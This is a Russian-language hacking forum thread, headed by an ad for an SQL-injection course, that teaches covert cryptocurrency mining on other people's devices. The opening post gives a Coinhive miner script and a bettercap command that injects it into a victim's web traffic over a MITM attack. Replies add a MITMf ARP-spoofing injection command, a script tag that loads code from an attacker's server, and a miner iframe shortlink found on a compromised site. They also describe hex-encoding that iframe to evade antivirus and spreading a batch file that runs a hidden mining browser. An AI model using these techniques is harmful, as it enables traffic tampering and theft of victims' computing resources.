• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Майним криптовалюту с помощью MITM атаки

Хайль всем, решил поделиться способ майнинга криптовалюты за счет MITM атаки.
Вы должны зарегаться тут:
Код: 
https://coinhive.com/
Теперь создаем html файл с таким содержимым:
Код: 
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('SITE_KEY');
    miner.start();
</script>
Где же взять SITE_KEY ? :
2018-06-08_12-07-22.png
2018-06-08_12-07-48.png
2018-06-08_12-08-09.png
Теперь заинжектим наш файл с помощью bettercap:
Код: 
bettercap -I wlan0(интерфейс) -T <ip цели> --proxy-module injecthtml --html-file <путь к файлу .html>
2018-06-08_12-14-49.png
ЗЫ. Если в сети много народу можно использовать xerosploit, у него есть функция инжекта для всех устройств, находящихся в сети.
 
  • Нравится
Реакции: Evanedi, explorer_traveler, pesl и ещё 14
Нажмите, чтобы раскрыть...
D

Dark Defender

New member
08.11.2017
2
0
BIT
0
Приветствую! Спасибо за статью! А после перезагрузки компа майнинг прекращается?
 
pr0phet

pr0phet

Platinum
02.04.2018
358
496
BIT
9
Tayrus сказал(а):
А что насчет SSLstrip?
Нажмите, чтобы раскрыть...
Работает убого! Читай почти не работает. Мало того, что нужно юзеру подтвердить серт, так еще и инет валит раз через раз совсем. Про HSTS вообще молчу...
 
Последнее редактирование:
+Maxon4ik

+Maxon4ik

Green Team
06.03.2018
23
48
BIT
0
p.r0phe.t сказал(а):
Работает убого! Читай почти не работает. Мало того, что нужно юзеру подтвердить серт, так еще и инет валит раз через раз совсем. Про HSTS вообще молчу...
Нажмите, чтобы раскрыть...
Как боженька смолвил)))))))))) c SSLstrip вообще все плохо!!!!!
 
L

Letun

Green Team
08.02.2018
50
30
BIT
0
Tayrus сказал(а):
ЗЫ. Если в сети много народу можно использовать xerosploit, у него есть функция инжекта для всех устройств, находящихся в сети.
Нажмите, чтобы раскрыть...
можно так же использовать MITMf
mitmf -i wlan0 --inject --js-file <путь-до-файла> --arp --spoof --gateway <ip роутера>
 
  • Нравится
Реакции: andromeda42
ghost

ghost

Grey Team
12.05.2016
1 636
3 286
BIT
0
Неплохо. Урезанный вариант старого доброго кофе майнера.
 
Lisenok

Lisenok

Green Team
02.04.2016
133
75
BIT
0
Код: 
<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>
Вот попробуйте, внедряется тоже через митм..А ну выше писали об этом
 
centr

centr

Green Team
31.01.2017
408
475
BIT
0
Существует SSLStrip2 (зеркало)он работает на порядок лучше, пробивает хром, правда не все сайты берёт, но гугл пробивает.

 
Последнее редактирование:
  • Нравится
Реакции: alex2k7 и Vertigo
F

fakecop

Green Team
23.12.2016
105
26
BIT
1
Так же можно сделать без митм атак
Создать html с тротлингом в половину, создать бат который будет запускать браузер в фоне с этой html и грамотно проспамить (конечно же это все только в теории)
А эту html можно как и на хост поставить, так и локально запускать на машине "жертвы"
 
+Maxon4ik

+Maxon4ik

Green Team
06.03.2018
23
48
BIT
0
этот Скрипт палят АВ, а вот если использовать шортлинки и Iframe + получившийся iframe перевести в 16-ричную строку... тогда все норм!)))))
 
+Maxon4ik

+Maxon4ik

Green Team
06.03.2018
23
48
BIT
0
fakecop сказал(а):
Про iframe можно подробнее?
Нажмите, чтобы раскрыть...
конечно, вот например нашел сайт......{http://} {runjiayuan} {.} {cn}, если открыть код страницы то первые 6 полных строк и будет то о чем я говорю.....ну и конечно открой диспечер задач и посмотри на загрузку процессора!!!!!! то что идет в скобках не очень понятно, но стоит преобразовать, и получим
<iframe src="{https://} {cnhv} {.} {co} {/3h2b2}" width="1" height="1" align="left"></iframe>
(фигурные скобки и пробелы надо убрать)------это и есть шортлинк в iframe))))))))))
 
Последнее редактирование:
  • Нравится
Реакции: fysh
ghostphisher

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Уже как больше полугода, браузер выдает предупреждение, что начинается майнинг в браузере. Даже стандартный IE EDGE в винде.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ